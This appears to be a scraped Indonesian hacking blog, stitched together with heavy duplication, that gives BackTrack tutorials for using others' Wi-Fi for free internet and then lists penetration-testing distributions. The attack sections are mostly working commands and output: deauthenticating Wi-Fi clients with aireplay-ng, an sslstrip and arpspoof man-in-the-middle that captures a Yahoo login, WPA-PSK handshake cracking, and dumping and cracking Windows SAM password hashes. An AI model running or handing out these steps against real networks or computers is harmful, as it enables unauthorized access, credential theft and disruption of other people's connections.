Pendahuluan
Tulisan ini saya buat untuk mewakili beberapa jawaban yang banyak di pertanyakan di forum indobacktrack
Kebanyakan para Attacker tidak mengetahui persis link tersebut merupakan link yang mengadung Internet / tidak
Ada beberapa aspek yang perlu di perhatikan:
1. Pastikan link tersebut merupakan Hotspot (klo sudah hospot berarti ada internet)
2. Pastikan Access Point tersebut bukan link point to point yang hanya di peruntukan untuk transmisi data / ip saja
3. Pastikan Router / Server ICS yang terkoneksi dengan Access point terdapat service DHCP Server / dan IP yang di provide oleh DHCP server dapat dipakai internet
4. Pastikan Wireless Device anda support Scanning / klo perlu support injection
5. Perhatikan Encryption yang di gunakan dan security yang di terapkan pada access point tersebut, misal WEP 64 bit(10 angka), WEP 128 Bit, WPA, WPA-PSK, WPA2, WPA-TKIP dll
Berikut saya tampilkan diagram network yang memungkinan kita "hack" dan memakai internet gratis
Gambar 1
Gambar 2
Penjelasan :
Gambar 1
1. Gambar di atas memungkinkan agar kita dapat "menghack" link tersebut dan mendapatkan internet gratis
2. Router tersebut terdapat DHCP server dan IP Segmen 10.10.10.0/24 yang dapat di pergunakan untuk internet
3. Router Sebagai Internet Connection Sharing / NAT
4. Acces point di gunakan sebagai bridge / jembatan / penganti media kabel dari user laptop dan pc user agar dapat request DHCP ke router
5. AP client di pergunakan untuk menggantikan Wireless Device yang terdapat pada notebook (dengan tujuan tertentu , mungkin jarak PC user terlalu jauh ke access point dll)
Gambar 2
1. Link tersebut merupakan link Point To point / bisa juga link Point to Multi Point
2. Router 2 hanya untuk routing static saja
3. Router 2 hanya sebagai distribusi Ip pada router di bawahnya
4. Router 2 tidak terdapat internet walaupun terkonesi dengan router 1
5. Link Wireless digunakan sebagai penganti kabel yang menghubungkan Router 2 dan Router 3
Kesimpulan
Dari 2 gambar di atas terlihat jelas perbedaan link wireless tersebut, wlw sama2 sebagai Aceess point station dan Access point Client namun router yang menghandle di atasnya mempunya fungsi yang berbeda.
Jika anda mendapat Access Point dan terkoneksi dengan acces point seperti skema gambar 1 namun router tampa DHCP server, backtrack sudah banyak tool yang menyediakan untuk scanning traffic ip yang lewat jika anda sudah terkonesi dengan access point tersebut
Belajar Komputer Dan Elektronika
Blog Seputar Belajar komputer,Linux,pemrogramman, dan Tips Trik
Jumat, 01 Juni 2012
Hacking Wifi di backtrack 3
Di dalam backtrack terdapat tools aircrack untuk hacking wifi, dan aircrack ini memiliki sejumlah kawan di antaranya aireplay-ng, airodump-ng, airmon-ng dan lain sebagainya.
Nah kali ini saya akan menjelaskan penggunaan dari aireplay-ng:
a. Aktifkan device wireless menjadi mode monitor
Penjelasan :
airmon-ng : design wireless device menjadi mode monitor
start,stop,check : [aktifkan, nonaktifkan, mengecek] wireless device berada di mode apa
interface : device wireless
Contoh : airmon-ng start wlan0
maka hasilnya :
Interface Chipset Driver
b. Mematikan seluruh client
aireplay-ng - -deauth [count] -c FF:FF:FF:FF:FF:FF -a [AP MAC] device_wifi
Penjelasan :
- -deauth : mematikan autentikasi station
count : Jumlah / lama waktu mematikan autentikasi station, jika count yang di input sudah selesai maka seluruh client aktif kembali.
Contoh : aireplay-ng - -deauth 10 -c FF:FF:FF:FF:FF:FF -a [AA:BB:CCD:EE:FF] mon0
c. Mematikan satu client
aireplay-ng - -deauth [count] -c [MAC client] -a [AP MAC] device_wifi
Penjelasan :
- -deauth : mematikan autentikasi station
count : Jumlah / lama waktu mematikan autentikasi station, jika count yang di input sudah selesai maka seluruh client aktif kembali.
Contoh : aireplay-ng - -deauth 10 -c A1:B2:C3:AFF:A4 -a [AA:BB:CCD:EE:FF] mon0
Kadang perintah aireply diatas tidak bisa karena channel dari AP-nya tidak sama dengan channel device wireless, jadi ulangi perintah tersebut hingga channel AP sama dengan device wireless yang kita miliki.
Nah kali ini saya akan menjelaskan penggunaan dari aireplay-ng:
a. Aktifkan device wireless menjadi mode monitor
airmon-ng
Penjelasan :
airmon-ng : design wireless device menjadi mode monitor
start,stop,check : [aktifkan, nonaktifkan, mengecek] wireless device berada di mode apa
interface : device wireless
Contoh : airmon-ng start wlan0
Interface Chipset Driver
wlan0 Unknown iwlagn - [phy0]
(monitor mode enabled on mon0)
(monitor mode enabled on mon0)
b. Mematikan seluruh client
Penjelasan :
- -deauth : mematikan autentikasi station
count : Jumlah / lama waktu mematikan autentikasi station, jika count yang di input sudah selesai maka seluruh client aktif kembali.
Contoh : aireplay-ng - -deauth 10 -c FF:FF:FF:FF:FF:FF -a [AA:BB:CCD:EE:FF] mon0
c. Mematikan satu client
Penjelasan :
- -deauth : mematikan autentikasi station
count : Jumlah / lama waktu mematikan autentikasi station, jika count yang di input sudah selesai maka seluruh client aktif kembali.
Contoh : aireplay-ng - -deauth 10 -c A1:B2:C3:AFF:A4 -a [AA:BB:CCD:EE:FF] mon0
sslstrip - hacking https
kali ini saya coba menjelaskan tentang hacking https connection menggunakan sslstrip..
langsung ke TKP...berikut adalah beberapa informasi mengenai jaringan :
- ip attacker : 192.168.1.50
- ip victim : 192.168.1.200
- gateway : 192.168.1.5
sekilas mengenai sslstrip :
root@h4ck:~# sslstrip --help
1.jalankan ssl strip :
root@h4ck:~# sslstrip -a -w laharisi
2.lakukan arpspoof terhadap victim
root@h4ck:~# root@h4ck:~# arpspoof -i vmnet1 -t 192.168.1.200 192.168.1.5
akftifkan fungsi ip_forward :
root@h4ck:~# echo 1 > /proc/sys/net/ipv4/ip_forward
3.redirect komunikasi http victim ( port 80 ) ke port yang di gunakan sslstrip ( 10000)
root@h4ck:~# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000
4. ketika victim melakukan login misalnya mail.yahoo.com,maka kita bisa melihat username dan password loginnya..caranya buka file dump ( laharisi )
root@h4ck:~# cat laharisi | grep -i "passwd="
kita bisa melihat bahwa username = bl4ck.4ngle dan password = disembunyikan
langsung ke TKP...berikut adalah beberapa informasi mengenai jaringan :
- ip attacker : 192.168.1.50
- ip victim : 192.168.1.200
- gateway : 192.168.1.5
sekilas mengenai sslstrip :
Code:
sslstrip 0.1 by Moxie Marlinspike Usage: sslstrip Options: -w , --write= Specify file to log to (optional). -p , --post Log only SSL POSTs. (default) -s , --ssl Log all SSL traffic to and from server. -a , --all Log all SSL and HTTP traffic to and from server. -l , --listen= Port to listen on (default 10000). -f , --favicon Substitute a lock favicon on secure requests. -k , --killsessions Kill sessions in progress. -h Print this help message
Code:
note : -opsi -a digunakan untuk logging semua trafic ( http,https) -opsi -s digunakan untuk logging traficc ssl saja -opsi -l digunakan untuk listen port ( meredirect port 80 victim,defaultnya 10000 ) -opsi : -w : tempat file dump akan disimpan.
Code:
url+="?";if(valid_js()){var passwd=form.passwd.value;var challen function hash2(form){var passwd=form.passwd.value 2009-06-30 19:22:34,004 SECURE POST Data (login.yahoo.com): .tries=1&.src=ym&.md5=&.hash=&.js=&.last=&promo=&.intl=us&.bypass=&.partner=& amp;.u=1esn43t54k0a5&.v=0&.challenge=EzdOJPTgncnTmCU_K. IjpAtfSawf&.yplus=&.emailCode=&pkg=&stepid=&.ev=&hasMsgr=0&.chkP=Y&.done=http%3A%2F%2Fmail.yahoo.com&.pd=ym_ver%3D0%26c%3D%26ivt%3D%26sg%3D&login=bl4ck.4ngle&passwd=disembunyikan&.save=Sign+In
Tutorial Cracking WPA-PSK
Sebenarnya Tutorial ini sudah sangat basi bagi kaum backtrackers, tapi ini khusus ditujukan kepada newbie yang ingin tahu tentang cara menghacking jaringan infrastructure dengan encryp WPA-PSK..agar tidak ada pertanyaan yang di ulang2 seperti yang terjadi di area pertanyaan pemula
semoga tutorial ini dapat membantu...
9. setelah mendapatkan paket handshake, selanjutnya adalah proses cracking dengan menggunakan aircrack dan file password dengan existensi .lst atau .txt dengan perintah
:~# aircrack-ng test-01.cap -w /pentest/passwords/wordlists/inawpa.txt
inawpa.txt adalah file password yang saya buat sendiri dan terletak pada /pentest/passwords/wordlists/inawpa.txt
sebagai informasi, keberhasilan proses cracking tergantung ada tidaknya password yang ada di list password dengan password yang sebenarnya...jika password yang digunakan pada jaringan tersebut ada di list password maka proses cracking akan berhasil dan jika password list yang qt miliki tidak mencatat password yang digunakan pada jaringan tersebut kemungkinan keberhasilan proses cracking akan gagal.
SEMOGA DAPAT MEMBANTU BAGI PARA NEWBIE...
kalo ada kekurangan mohon dicerahkan.
semoga tutorial ini dapat membantu...
- Sebagai informasi
Tutorial ini telah dipraktekan langsung oleh saya sendiri pada jaringan warnet yang merupakan punya teman saya dan atas sepengetahuan dia...
sengaja tidak ada yang di kaburkan supaya lebih dimengerti
1. Siapkan CD Live Backtrack n tentunya dengan partnernya n of course sebatang rokok agar lebih santai..
2. masuk ke dekstop dengan perintah ~# startx
3. buka konsole dan ketikkan perintah :~# ifconfig -a
4. :~# ifconfig wlan0 up (tuk mengaktifkan interface wlan0)
5. :~# airmon-ng
:~# airmon-ng start wlan0[/color] (tuk membuat virtual interface mode monitor)
6. ~# airodump-ng mon0 (tuk memonitoring jaringan yang ada di sekitar)
mon0 adalah interface virtual hasil dari airmon-ng tadi
hasil dari airodump-ng mon0
7. :~# airodump-ng -w test --channel 11 --bssid 00904c910001 mon0
(tuk memonitoring khusus jaringan yang memiliki bssid 00:90:4C:91:00:01 pada channel 11 dan hasil dari monitoring di tulis pada file yang bernama 'test')
8. :~# aireplay-ng -0 1 -a 00904c910001 -c oo1cbfa13fe3 mon0
(aireplay-ng digunakan untuk mendisconnect salah satu client yaitu 00:1C:BF:A1:3F:E3 untuk mendapatkan paket handshake yang dibutuhkan untuk proses cracking)
-0 : mode serangan deAuthentication
1 : dilakukan sebanyak 1x deAuth
9. setelah mendapatkan paket handshake, selanjutnya adalah proses cracking dengan menggunakan aircrack dan file password dengan existensi .lst atau .txt dengan perintah
:~# aircrack-ng test-01.cap -w /pentest/passwords/wordlists/inawpa.txt
inawpa.txt adalah file password yang saya buat sendiri dan terletak pada /pentest/passwords/wordlists/inawpa.txt
sebagai informasi, keberhasilan proses cracking tergantung ada tidaknya password yang ada di list password dengan password yang sebenarnya...jika password yang digunakan pada jaringan tersebut ada di list password maka proses cracking akan berhasil dan jika password list yang qt miliki tidak mencatat password yang digunakan pada jaringan tersebut kemungkinan keberhasilan proses cracking akan gagal.
SEMOGA DAPAT MEMBANTU BAGI PARA NEWBIE...
kalo ada kekurangan mohon dicerahkan.
Cracking Password Windows Via BT 4 PreFinal
Meskipun gwe seorang newbie, tapi itu gak akan menghilangkan semangat gwe untuk membuat sebuah tutorial yang bisa di share buat teman-temin semua, terlepas dari banyak kekurangan disana sini ane mohon maaf yeh , hehehe...
pertama-tama sebelum memulai gwe mau tutup dulu video miyabi unscensored gwe neh..., huahahhaa..., becanda fren........, kamsud gwe gwe selipin dulu sebatang rokok dan menyeruput kopi panas yg maknyus tenan.....,
wokeh langsung aja dah tanpa memperpanjang mukadimah alias preface....
untuk kali ini kita akan mencoba cracking password windows via backtrack 4 live CD (kamsudnya dengan booting melalui CD backtrack 4), sebetulnya tutorial ini pernah di buat oleh ncang assadotcom di JS dengan menggunakan BT 2 kalo gak salah, tapi untuk kali ini ane coba di BT 4 prefinal.
1.Pertama setting di bios anda booting dari CD
2.Kemudian masuk ke BT seperti biasa dengan perintah startx
3.kita lanjut ke tahap mengkases file windows via BT, kenapa kita mengakses data windows, yah terang aja kan kita mau ngecrack passwordnya yg terletak di direktori C://WINDOWS/system32/config/ SAM , file yg bernama SAM inilah tempat di mana windows menyembunyikan password login windows. Wokeh lalu masuk di bt console dan ikuti langkah berikut:
untuk mengakses file window dan mounting di BT
pertama-tama sebelum memulai gwe mau tutup dulu video miyabi unscensored gwe neh..., huahahhaa..., becanda fren........, kamsud gwe gwe selipin dulu sebatang rokok dan menyeruput kopi panas yg maknyus tenan.....,
wokeh langsung aja dah tanpa memperpanjang mukadimah alias preface....
untuk kali ini kita akan mencoba cracking password windows via backtrack 4 live CD (kamsudnya dengan booting melalui CD backtrack 4), sebetulnya tutorial ini pernah di buat oleh ncang assadotcom di JS dengan menggunakan BT 2 kalo gak salah, tapi untuk kali ini ane coba di BT 4 prefinal.
1.Pertama setting di bios anda booting dari CD
2.Kemudian masuk ke BT seperti biasa dengan perintah startx
3.kita lanjut ke tahap mengkases file windows via BT, kenapa kita mengakses data windows, yah terang aja kan kita mau ngecrack passwordnya yg terletak di direktori C://WINDOWS/system32/config/ SAM , file yg bernama SAM inilah tempat di mana windows menyembunyikan password login windows. Wokeh lalu masuk di bt console dan ikuti langkah berikut:
untuk mengakses file window dan mounting di BT
root@backtrackers:~# mountconfig
ode:
Type: Automatic Mount Point: /mnt/sda1 (kalo belum ada folder sda1 nya silahkan di buat yah) Device: /dev/sda1/
selanjutnya lakukan mounting dengan perintah:
lalu lihat secara detail file windowsnya, bisa juga kita lihat di explorer nya bt dimana letak file SAM nya.
Code:
-rwxrwxrwx 1 root root 262144 2009-11-10 00:17 /mnt/sda1/WINDOWS/system32/config/SAM
Code:
total 31916 -rwxrwxrwx 1 root root 6029312 2009-11-11 01:23 system
okey kita udah dapet yg namanya file system, dan untuk selanjutnya kita akan capture file syskey tersebut dan kita jadikan sebuah file dengan program yg namanya bkhive yang terletak di :
aplikasi > backtrak > privilege escalation > password attack > offline attack > bkhive
atau langsung ketik di console juga gpp, gak dosa kok ), disini nama file output yg gwe buat adalah wsyskey (buat penamaan terserah lo pada deh, mau bikin asiacarerasyskey atau tukul_syskey juga ga jadi masalah ) )
Code:
bkhive 1.1.1 by Objectif Securite http://www.objectif-securite.ch original author: ncuomo@studenti.unina.it Root Key : $$$PROTO.HIV Default ControlSet: 001 Bootkey: 0c7b80c915ccc01cd4e949af7ebdde90
Code:
root@backtrackers:~# ls -l -rw-r--r-- 1 root root 16 2009-11-10 23:01 wsyskey
aplikasi > backtrak > privilege escalation > password attack > offline attack > samdump2
so yang artinya, jadi.., masukin perintah begono noh......, sehingga muncullah beberapa login yg ada di windows yg udah kita dump dari file sam
Code:
samdump2 1.1.1 by Objectif Securite http://www.objectif-securite.ch original author: ncuomo@studenti.unina.it Root Key : SAM Administrator:500:545a8bd6333a94aff4227b3697fb5b7c:71dd6e54afa0b12d34f6aadb93a02564::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:4977de14abb666c164f9f2ff61b57ac6:2932ca40988c78b801d226c8140b6702::: juliaperes:1002:aad3b435b51404eeaad3b435b51404ee:ce899a3735c9489ffdc2c48df3ed6fdd::: vinblackganteng:1003:85fcfffed6e0e9fcb75e0c8d76954a50:b33902ac5aacd0a02af58e900fa594a5:::
Code:
samdump2 1.1.1 by Objectif Securite http://www.objectif-securite.ch original author: ncuomo@studenti.unina.it Root Key : SAM
Code:
root@backtrackers:~# ls -l total 162944 -rw-r--r-- 1 root root 431 2009-11-10 23:05 whash.txt
Code:
Administrator:500:545a8bd6333a94aff4227b3697fb5b7c:71dd6e54afa0b12d34f6aadb93a02564::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:4977de14abb666c164f9f2ff61b57ac6:2932ca40988c78b801d226c8140b6702::: juliaperes:1002:aad3b435b51404eeaad3b435b51404ee:ce899a3735c9489ffdc2c48df3ed6fdd::: vinblackganteng:1003:85fcfffed6e0e9fcb75e0c8d76954a50:b33902ac5aacd0a02af58e900fa594a5:::
aplikasi > backtrak > privilege escalation > password attack > offline attack > john
Code:
root@backtrackers:/pentest/passwords/jtr# ./john /root/whash.txt
Karena bang john tidak bisa membedakan huruf besar kecil dan besar maka kita lihat file yg di simpen bang john di direktori dia sendiri yaitu
Code:
$1$xd5xuJYT$x6un0Ho.gXVCv4ZduhsYQ.:toor $LM$aad3b435b51404ee: $LM$f4227b3697fb5b7c:SEKSI $LM$b75e0c8d76954a50:GANTENG123
dan yang terkahir setelah kita lihat di direktori bang john kembali kita tampilkan file pamungkas dengan perintah cat
vinblackganteng: ganteng123
juliaperes: SEKSI
NB:
1. untuk proses crackingnya terkadang penggunaan password yg panjang dan multikarakter sepertinya bang john cukup kesulitan atau memakan waktu lama (perasaan ane sih, mungkin ada temen2 laen yg punya teknik sendiri atau solusi, yang jelas file hash nya udah kita dapetin)
2. dalam proses cracking ini bang john tidak akan mengulangi lagi terhadap file yang udah di cracknya, jadi walaupun kita mengulanginya sampai 10 kali, si john tetap pada pendiriannya yaitu cracking yg pertama.
Selasa, 29 Mei 2012
Jenis Distro Hacking
Saat ini banyak sekali distribusi Linux khusus untuk Penetrating System/Hacking,selain distro Backtrack yang sering kita gunakan ternyata masih banyak lagi distro serupa yang muncul akibat dari kebutuhan yang berbeda-beda dari setip pengguna,selain itu juga tentu saja untuk mencari distro paling solid dan stabil.
BackTrack
Selamat Datang di backtrack-linux.org, rumah bagi keamanan distribusi Linux terbesar sejauh ini. BackTrack merupakan gudangnya program berdasarkan penetrasi, yang membantu profesional keamanan kemampuan untuk melaksanakan penilaian dalam lingkungan,dan tentu saja asli dan murni didedikasikan untuk pembajakan. Terlepas jika Anda membuat BackTrack sistem operasi utama Anda, booting dari LiveDVD, atau menjadi favorit Anda, BackTrack telah disesuaikan untuk setiap jenis paket, script konfigurasi kernel, dan patch semata-mata untuk tujuan pengujian penetrasi .
BackTrack ditujukan untuk semua pemirsa dengan profesional keamanan yang paling berpengalaman untuk pendatang baru di bidang keamanan informasi. BackTrack mempromosikan cepat dan mudah untuk menemukan dan update database terbesar kumpulan alat keamanan.
http://www.backtrack-linux.org
GnackTrack
GnackTrack adalah LiveCD (dan diinstal) distribusi Linux dirancang untuk menguji penetrasi dan didasarkan pada Ubuntu.
GnackTrack adalah distribusi pengujian penetrasi untuk para penggemar Gnome.
Banyak dari kita telah mendengar BackTrack, masih menggunakan KDE. Banyak orang lebih memilih distribusi berbasis Gnome, dan dengan demikian lahir GnackTrack. GnackTrack awalnya diciptakan dengan menambahkan Gnome di BackTrack dan kupas atas bagian dari KDE, tapi ini sangat disayangkan, Ada banyak cruft left sehingga diputuskan untuk membangun sebuah penetrasi cd gnome berdasarkan dari awal.
Karena Ubuntu adalah salah satu distribusi yang paling populer, masuk akal untuk GnackTrack, terutama karena 10.04LTS akan memiliki dukungan jangka hidup.
olah karena itu mengapa distro ini disebut GnackTrack (Gnome + Backtrack),menurut saya GnackTrack kurang profesional karena masih menggunakan repo dari Backtrack tanpa ada timbal baliknya dari GnackTrack,sehingga membuat kecewa Orang yang membuat Backtrack.
http://www.gnacktrack.co.uk
NodeZero
NodeZero adalah Ubuntu Linux yang dirancang sebagai sebuah sistem lengkap yang juga dapat digunakan untuk pengujian penetrasi. NodeZero menggunakan Ubuntu repositori agar sistem anda selalu diperbarui. Konfigurasi sistem sangat penting dan terutama ditujukan untuk instalasi dan kustomisasi dari disk yang Anda inginkan. NodeZero dilengkapi dengan lebih dari 300 alat untuk pengujian penetrasi dan satu set layanan inti yang diperlukan untuk pengujian penetrasi. mereka juga menyiapkan alat repositori agar sistem anda diperbarui setiap saat.
http://netinfinity.org
Samurai Web Testing Framework
Samurai Web Testing Framework adalah linux lingkungan hidup yang telah pra-dikonfigurasi untuk berfungsi sebagai pen-test environment web. CD berisi aplikasi terbaik dari open source dan tools gratis yang berfokus pada pengujian dan menyerang website. Dalam pengembangnya distribusi ini, Samurai Web Testing Framework didasarkan pada seleksi tools/alat yang paling sering digunakan dalam praktik keamanan. Samurai Web Testing Framework menyertakan alat-alat yang digunakan dalam semua empat tahapan web-pen test.
http://samurai.inguardians.com/
Hacking Live CD
Hacking Live CD adalah salah satu distribusi Linux yang diisi dengan alat-alat baru dan utilitas untuk ethical hacking, penetration testing and verification countermeasure. Berdasarkan Ubuntu livecd dan dijalankan seperti "berjalan langsung dari CD dan tidak memerlukan instalasi pada hard drive Anda Setelah dimulai. Anda bisa menggunakan alat termasuk untuk test, verify, ethically hack dan perform penetration tests pada jaringan Anda sendiri untuk memastikan dia aman dari penyusup luar.
http://www.livehacking.com/live-hacking-cd
Pentoo
Pentoo adalah Live CD dan Live USB dirancang untuk menguji penetrasi dan evaluasi keamanan. Basednya adalah Gentoo Linux, Pentoo memiliki versi 32 dan 64 bit livecd. Memiliki driver injeksi paket update Wi-Fi, GPGPU perangkat lunak cracking [2], dan banyak alat untuk pengujian penetrasi dan evaluasi keamanan.
http://www.pentoo.ch/
Network Security Toolkit
Selamat datang di Network Security Toolkit (NST). ISO ini bootable live CD / DVD (Live NST) didasarkan pada Fedora. Manual ini dirancang untuk memberikan akses mudah ke best-of-breed Aplikasi Sumber Terbuka, Keamanan Jaringan dan berjalan pada platform yang paling x86/x86_64.
http://www.networksecuritytoolkit.org/nst/
OWASP Live CD
OWASP LiveCD, merupakan proyek yang menyatukan beberapa proyek terbaik dari keamanan open source dalam CD tunggal. Web developer, tester dan profesional keamanan dapat mulai dari LiveCD ini dan memiliki akses ke set lengkap uji keselamatan. Hal ini memungkinkan pengguna Anda untuk menguji berbagai masalah keamanan aplikasi web dan situs web.
http://appseclive.org
Arudius
Arudius adalah Linux liveCD dengan alat-alat untuk pengujian penetrasi dan analisis kerentanan. Apa yang disebut "Linux liveCD" pada dasarnya adalah sistem operasi Linux, yang dinyalakan dan dijalankan langsung dari CD-ROM standar. Hal ini memungkinkan untuk meningkatkan portabilitas dan sistem operasi untuk menjalankan berbagai perangkat lunak Linux di hampir semua sistem fisik tanpa mempengaruhi sistem host operasi yang terpasang pada hard disk. Ini adalah konsep yang menggali Arudius juga. Saat ini, Arudius memiliki alat keamanan yang lebih dari 140 dan pengemasan yang berbeda
http://www.tdisecurity.com/tdi-labs/arudius.htm
WeakNet
WeakNet Linux, dirancang terutama untuk pengujian penetrasi, forensik dan tugas-tugas keamanan lainnya. Lingkungan desktop default adalah GNOME.
http://weaknetlabs.com/main/
Backbox
Backbox adalah distribusi Linux berbasis Ubuntu LTS 10.04 Lucid dirancang untuk melakukan tes penetrasi dan penilaian keamanan. Dirancang untuk menjadi cepat, mudah digunakan dan minim,tetapi belum lengkap karena repositori sendiri perangkat lunak desktop selalu upgrade ke versi stabil terbaru dari alat terbaik dikenal dan paling sering digunakan etical hacking.
www.backbox.org/public/
Matriux
Matriux adalah distribusi keamanan dengan semua sumber daya yang terdiri dari banyak open source yang kuat dan tools gratis yang dapat digunakan untuk berbagai tujuan, termasuk namun tidak terbatas pada, penetration testing, ethical hacking, system and network administration, cyber forensic investigations, security testing, vulnerability analysis, dan banyak lagi. Ini adalah distribusi dirancang bagi para profesional keamanan dan penggemar, walaupun biasanya dapat digunakan sebagai sistem desktop default Anda. Dengan Matriux, Anda dapat mengubah sistem apapun menjadi kuat set alat untuk pengujian penetrasi, tanpa harus menginstal perangkat lunak apapun pada hardisk Anda. Matriux dirancang untuk bekerja dalam lingkungan hidup sebagai tongkat, CD / DVD atau USB atau dapat dengan mudah diinstal pada hard drive anda dalam beberapa langkah. Matriux juga mencakup seperangkat alat untuk forensik komputer dan pemulihan data yang dapat digunakan untuk analisis forensik dan penelitian dan pemulihan data.
http://www.matriux.com
Secmic
Secmic adalah liveCD keamanan distribusi Linux yang dapat digunakan oleh profesional keamanan atau untuk tujuan pendidikan. Hal ini gratis untuk men-download, dan selalu akan. Ini terdiri dari lebih dari 200 aplikasi keamanan yang berorientasi dan menjaga open source Ubuntu / Kubuntu update kompatibilitas, berarti Anda akan dapat menerima update keamanan langsung dari repositori Ubuntu / Kubuntu.
http://sourceforge.net/p/secmic/home//index.html
Distribusi alat-alat keamanan
DTS adalah berbasis Linux Security Tool. Memang, itu adalah kumpulan dari ratusan bahkan ribuan alat keamanan untuk open source. Ini adalah distro Linux LiveCD, yang berarti berjalan dari CD di memori tanpa mengubah sistem operasi asli dari komputer host. Satu-satunya tujuan dalam hidup adalah untuk menempatkan sebagai alat keamanan banyak yang Anda inginkan.
http://s-t-d.org
NetSecL
NetSecL Linux adalah dengan setup default dengan distribusi meninggalkan mengeras ke tingkat keamanan yang masih digunakan dan menyediakan peralatan yang diperlukan untuk menguji keamanannya. GrSecurity firewall dan itu merupakan ciri yang membuat distribusi eksklusif dengan paket dibangun khusus: Amap, ettercap, Hydra, Kismet, Nessus, Nmap, Metasploit, PADS.
http://netsecl.linuxfreedom.com
VAST
VAST adalah VIPER distribusi laboratorium yang berisi alat VIPER hidup dikembangkan sebagai UCsniff, videosnarf videojak, dan banyak lagi. Seiring dengan alat VIPER dan alat-alat lain keamanan penting VoIP, juga berisi alat untuk penguji penetrasi digunakan sebagai Metasploit, Nmap dan Hydra.é distribusi pekerjaan yang sedang berjalan.
http://vipervast.sourceforge.net
Blackbuntu
Blackbuntu adalah distribusi pengujian penetrasi yang telah dirancang khusus untuk mahasiswa dan pelatihan keamanan informasi keamanan profesional.
Blackbuntu adalah distribusi pengujian penetrasi dengan GNOME Desktop Environment. Saat ini sedang dibangun menggunakan Ubuntu 10.10 dan bekerja referensi pada Back | Track. Itu dibuat hanya untuk sebagai hobi saja.
http://www.blackbuntu.com/
PHLAK
PHLAK atau [P] rofessional [H] Acker's [L] inux [A] ssault [K] itu adalah keamanan modular dari distribusi Linux (aka LiveCD). PHLAK dilengkapi dengan dua lingkungan (fluxbox dan xfce4), alat-alat keamanan banyak, dan buku catatan penuh dokumentasi keamanan. PHLAK adalah turunan dari Morphix, dibuat oleh Alex de Landgraaf.
Terutama di sekitar Penetrasi Testing, PHLAK adalah sistem yang setiap hacker atau pentest harus dimiliki.
http://sourceforge.net/projects/phlakproject/
Download versi terbaru 0,3 - ftp://ftp.ussg.iu.edu/linux/phlak/phlak-0.3.iso>
STD 0.1
STD adalah berbasis Linux Security Tool. Memang, itu adalah kumpulan dari ratusan bahkan ribuan alat keamanan untuk open source. Ini adalah Live Linux Distro, yang berarti berjalan dari CD di memori tanpa mengubah sistem operasi asli dari komputer host. Satu-satunya tujuan dalam hidup adalah untuk menempatkan sebagai alat keamanan banyak yang Anda inginkan dengan mudah menggunakan antarmuka.
DST adalah untuk digunakan baik oleh pemula dan admin keamanan profesional tetapi tidak ideal bagi Pengguna yang belum pernah menggunakan Linux. DST mengasumsikan Anda tahu dasar-dasar Linux karena sebagian besar karyanya akan dilakukan dari baris perintah. Jika Anda benar-benar baru untuk Linux, Anda sebaiknya mulai dengan distro hidup seperti Knoppix untuk berlatih dasar-dasar.
DTS dirancang untuk membantu administrator jaringan dan profesional melindungi jaringan mereka
http://s-t-d.org/index.html
nUbuntu
nUbuntu atau Network Ubuntu adalah jauh lebih seorang pemula di arena sebagai LiveCD Ubuntu, yang didasarkan, cukup baru sendiri.
Tujuan utama dari nUbuntu adalah untuk membuat distribusi yang berasal dari distribusi Ubuntu, dan menambahkan paket yang terkait dengan pengujian keamanan, dan menghapus paket yang tidak diperlukan, seperti Gnome, Openoffice.org, and Evolution. nUbuntu merupakan hasil dari ide dua orang harus membuat distribusi baru untuk pengalaman belajar.
http://www.nubuntu.org/
Jadi Distro manakah yang pas untuk kamu ?
BackTrack
Selamat Datang di backtrack-linux.org, rumah bagi keamanan distribusi Linux terbesar sejauh ini. BackTrack merupakan gudangnya program berdasarkan penetrasi, yang membantu profesional keamanan kemampuan untuk melaksanakan penilaian dalam lingkungan,dan tentu saja asli dan murni didedikasikan untuk pembajakan. Terlepas jika Anda membuat BackTrack sistem operasi utama Anda, booting dari LiveDVD, atau menjadi favorit Anda, BackTrack telah disesuaikan untuk setiap jenis paket, script konfigurasi kernel, dan patch semata-mata untuk tujuan pengujian penetrasi .
BackTrack ditujukan untuk semua pemirsa dengan profesional keamanan yang paling berpengalaman untuk pendatang baru di bidang keamanan informasi. BackTrack mempromosikan cepat dan mudah untuk menemukan dan update database terbesar kumpulan alat keamanan.
http://www.backtrack-linux.org
GnackTrack
GnackTrack adalah LiveCD (dan diinstal) distribusi Linux dirancang untuk menguji penetrasi dan didasarkan pada Ubuntu.
GnackTrack adalah distribusi pengujian penetrasi untuk para penggemar Gnome.
Banyak dari kita telah mendengar BackTrack, masih menggunakan KDE. Banyak orang lebih memilih distribusi berbasis Gnome, dan dengan demikian lahir GnackTrack. GnackTrack awalnya diciptakan dengan menambahkan Gnome di BackTrack dan kupas atas bagian dari KDE, tapi ini sangat disayangkan, Ada banyak cruft left sehingga diputuskan untuk membangun sebuah penetrasi cd gnome berdasarkan dari awal.
Karena Ubuntu adalah salah satu distribusi yang paling populer, masuk akal untuk GnackTrack, terutama karena 10.04LTS akan memiliki dukungan jangka hidup.
olah karena itu mengapa distro ini disebut GnackTrack (Gnome + Backtrack),menurut saya GnackTrack kurang profesional karena masih menggunakan repo dari Backtrack tanpa ada timbal baliknya dari GnackTrack,sehingga membuat kecewa Orang yang membuat Backtrack.
http://www.gnacktrack.co.uk
NodeZero
NodeZero adalah Ubuntu Linux yang dirancang sebagai sebuah sistem lengkap yang juga dapat digunakan untuk pengujian penetrasi. NodeZero menggunakan Ubuntu repositori agar sistem anda selalu diperbarui. Konfigurasi sistem sangat penting dan terutama ditujukan untuk instalasi dan kustomisasi dari disk yang Anda inginkan. NodeZero dilengkapi dengan lebih dari 300 alat untuk pengujian penetrasi dan satu set layanan inti yang diperlukan untuk pengujian penetrasi. mereka juga menyiapkan alat repositori agar sistem anda diperbarui setiap saat.
http://netinfinity.org
Samurai Web Testing Framework
Samurai Web Testing Framework adalah linux lingkungan hidup yang telah pra-dikonfigurasi untuk berfungsi sebagai pen-test environment web. CD berisi aplikasi terbaik dari open source dan tools gratis yang berfokus pada pengujian dan menyerang website. Dalam pengembangnya distribusi ini, Samurai Web Testing Framework didasarkan pada seleksi tools/alat yang paling sering digunakan dalam praktik keamanan. Samurai Web Testing Framework menyertakan alat-alat yang digunakan dalam semua empat tahapan web-pen test.
http://samurai.inguardians.com/
Hacking Live CD
